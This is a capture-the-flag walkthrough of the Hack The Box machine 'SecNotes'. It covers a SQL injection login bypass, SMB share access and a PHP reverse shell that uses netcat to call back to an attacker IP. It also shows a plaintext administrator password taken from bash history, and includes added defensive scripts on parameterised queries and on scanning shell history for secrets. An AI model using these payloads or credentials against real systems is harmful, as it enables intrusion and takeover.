SecNotes
OS: Windows, Difficulty: Medium, IP: 10.10.10.97
Initial Enumeration
# Nmap 7.70 scan initiated Sun Jul 28 22:30:37 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,445,8808 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h13m10s, deviation: 4h02m31s, median: -6m51s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2019-07-28T09:54:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-28 22:24:14
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 243.88 ms 10.10.14.1
2 478.09 ms 10.10.10.97
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 28 22:31:41 2019 -- 1 IP address (1 host up) scanned in 65.43 seconds
We'll perform a two-stage SQL injection against this website: the payload is entered once on the Registration form and once on the Login form, using the following credentials.
Username: ' or '1'='1
Password: ' or '1'='1
This attack reveals credentials for the user Tyler, which we'll use to access this user's SMB shares.
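To make clear why that username/password pair works, here is an added Python example (not code from the write-up or from the SecNotes application) that builds a throwaway SQLite users table and runs the login check two ways: the string-concatenated query a vulnerable login page would use, and the parameterised query that fixes it. The table layout, the user rows and the placeholder hashes are assumptions made for this example, not the box's real schema.

```python
"""Added example (not from the original write-up): why ' or '1'='1 logs you in.

Builds an in-memory SQLite users table (constructed sample data) and runs the
same login check two ways: string concatenation, as in a vulnerable login page,
and a parameterised query that treats the input purely as data.
Table and column names are assumptions, not the real SecNotes schema.
"""
import sqlite3

PAYLOAD = "' or '1'='1"  # the username/password pair used in the write-up


def make_db() -> sqlite3.Connection:
    """Constructed sample users table; the 'hashes' are placeholders, not real ones."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("tyler", "placeholder-hash-1"), ("admin", "placeholder-hash-2")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Login check built by string concatenation: the input becomes part of the SQL.

    With both fields set to ' or '1'='1 the WHERE clause becomes
        username='' or '1'='1' and password='' or '1'='1'
    which is true for every row, so the first user in the table is returned.
    """
    sql = (
        "SELECT username FROM users WHERE username='" + username
        + "' and password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(conn, username: str, password: str):
    """Same check with bound parameters: the quotes in the payload are just characters."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? and password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", login_vulnerable(db, PAYLOAD, PAYLOAD))     # a user, no password needed
    print("parameterised:", login_parameterised(db, PAYLOAD, PAYLOAD))  # None
```

With both fields set to the payload, the concatenated WHERE clause is true for every row, so a user is returned without any valid password. The bound-parameter version passes the same characters as data, matches nothing and returns None; that is the fix to look for in login.php-style code, together with hashed passwords rather than the plaintext placeholders used here.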
$ smbclient -U 'tyler' -L \\\\10.10.10.97
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\tyler password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
new-site Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.97 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
$ smbclient -U 'tyler' \\\\10.10.10.97\\new-site
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\tyler password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jul 29 16:38:28 2019
.. D 0 Mon Jul 29 16:38:28 2019
iisstart.htm A 696 Thu Jun 21 20:56:03 2018
iisstart.png A 98757 Thu Jun 21 20:56:03 2018
Microsoft D 0 Mon Jul 29 15:17:39 2019
12978687 blocks of size 4096. 8121274 blocks available
smb: \>
As the share contents show (iisstart.htm and iisstart.png, the default IIS landing page), new-site is the web root of the second web server found during the initial enumeration phase, the one running on port 8808.
Now we'll upload a simple PHP reverse shell and netcat.exe onto the SMB share to get a reverse shell on the system.
Netcat - https://eternallybored.org/misc/netcat/
<?php
// runs the nc64.exe binary uploaded to the same share, connecting back to the listener
system('nc64.exe -e cmd.exe 10.10.14.13 9999');
?>
User Own
C:\Users\tyler\Desktop>type user.txt
type user.txt
6fa75***
Root Own
C:\Users\tyler\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9CDD-BADA
Directory of C:\Users\tyler\Desktop
08/19/2018 03:51 PM <DIR> .
08/19/2018 03:51 PM <DIR> ..
06/22/2018 03:09 AM 1,293 bash.lnk
04/11/2018 04:34 PM 1,142 Command Prompt.lnk
04/11/2018 04:34 PM 407 File Explorer.lnk
06/21/2018 05:50 PM 1,417 Microsoft Edge.lnk
06/21/2018 09:17 AM 1,110 Notepad++.lnk
08/19/2018 09:25 AM 34 user.txt
08/19/2018 10:59 AM 2,494 Windows PowerShell.lnk
7 File(s) 7,897 bytes
2 Dir(s) 33,264,689,152 bytes free
Another thing to notice in the Desktop folder is a link to bash (bash.lnk). This means WSL is installed, so let's explore that.
C:\Windows>dir /s /b | findstr bash.exe
dir /s /b | findstr bash.exe
C:\Windows\System32\bash.exe
C:\Windows\System32\en-US\bash.exe.mui
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash.resources_31bf3856ad364e35_10.0.17134.1_en-us_982dd7ac5c23ee9a\bash.exe.mui
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
Launching bash.exe drops us into the WSL distribution as root:
C:\Windows>C:\Windows\System32\bash.exe
C:\Windows\System32\bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
id
uid=0(root) gid=0(root) groups=0(root)
# ls -la /root
ls -la /root
total 8
drwx------ 1 root root 512 Jun 22 2018 .
drwxr-xr-x 1 root root 512 Jun 21 2018 ..
---------- 1 root root 398 Jun 22 2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxrwxrwx 1 root root 512 Jun 22 2018 filesystem
There's nothing of interest in the root directory itself; however, .bash_history has some interesting contents.
# cat .bash_history
cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit#
It contains the smbclient command line with the administrator password embedded in it. Let's use that to connect to the C$ share via SMB.
$ smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Try "help" to get a list of possible commands.
smb: \> cd Users/Administrator/Desktop
smb: \Users\Administrator\Desktop\> dir
. DR 0 Sun Aug 19 22:31:17 2018
.. DR 0 Sun Aug 19 22:31:17 2018
desktop.ini AHS 282 Sun Aug 19 22:31:17 2018
Microsoft Edge.lnk A 1417 Sat Jun 23 05:15:06 2018
root.txt A 34 Sun Aug 19 22:33:54 2018
12978687 blocks of size 4096. 8121243 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\>
$ cat root.txt
7250c***
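The .bash_history finding above is worth turning into a routine check: the administrator password was only recoverable because it was typed on the smbclient command line (the user%password syntax) and so landed in the history file. The following Python script, added here as an example and not part of the original write-up, scans shell-history text for command lines that embed a password (smbclient's user%password form, mount's password= option, mysql's -p) and reports each hit with the secret redacted. The sample history, the hosts, share names and passwords in it are constructed for this example.

```python
"""Added example (not from the original write-up): flag passwords left in shell history.

The root .bash_history on the box handed over the administrator password because it
was typed on the smbclient command line. This scanner looks for that pattern and a
few equivalents and reports each hit with the secret redacted.
"""
import re

# Each pattern names the secret with the group "secret". Patterns are checked in
# order and a line is reported once, under the first pattern that matches.
PATTERNS = {
    # smbclient -U 'user%pass'  /  smbclient --user=user%pass
    "smbclient -U user%pass": re.compile(
        r"smbclient\b.*?(?:-U|--user[= ])\s*['\"]?[^'\"\s%]+%(?P<secret>[^'\"\s]+)"
    ),
    # mount / mount.cifs ... -o user=...,password=pass
    "mount -o password=": re.compile(
        r"\bmount(?:\.cifs)?\b.*?\bpassword=(?P<secret>[^,\s'\"]+)"
    ),
    # mysql -ppass  /  mysql --password=pass  (a bare -p, which prompts, is fine)
    "mysql -p<pass>": re.compile(
        r"\bmysql\b.*?(?:-p|--password=)(?P<secret>[^\s'\"]+)"
    ),
    # anything else of the form password=... / token=... / secret=...
    "key=value secret": re.compile(
        r"\b(?:passwd|password|pass|token|secret)=(?P<secret>[^\s'\"]+)", re.IGNORECASE
    ),
}

# Constructed sample history: hosts, share names and passwords are made up.
SAMPLE_HISTORY = r"""cd /mnt/c/
ls
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/ -o user=administrator
mount -t cifs //10.0.0.5/share /mnt/share -o user=svc_backup,password=Example#1
smbclient -U 'tyler' -L \\\\10.10.10.97
smbclient -U 'administrator%Example-Pass-2' \\\\127.0.0.1\\c$
mysql -u root -pExample3 inventory
smbclient -A ~/.smbcreds \\\\127.0.0.1\\c$
exit"""


def redact(secret: str) -> str:
    """Keep the first character and the length: enough to triage without re-exposing it."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def scan_history(text: str):
    """Return [(line_no, pattern_name, redacted_line)] for each credential-bearing line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pat in PATTERNS.items():
            m = pat.search(line)
            if m:
                secret = m.group("secret")
                hits.append((no, name, line.replace(secret, redact(secret))))
                break  # one report per line is enough
    return hits


def scan_sample():
    """Run the scanner over the constructed sample history."""
    return scan_history(SAMPLE_HISTORY)


if __name__ == "__main__":
    for no, name, line in scan_sample():
        print(f"line {no:>3}  [{name}]  {line}")
```

The two smbclient lines that produce no hit show the safer forms: -U 'tyler' with the password typed at the prompt, and -A with an authentication file (mount.cifs has the equivalent credentials= option). Both keep the secret out of the history file and out of the process list, which is where the administrator password on this box was found.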
Learning Outcome
This box was mostly SMB focused, so I had to do a lot of research to understand all the attacks that failed :P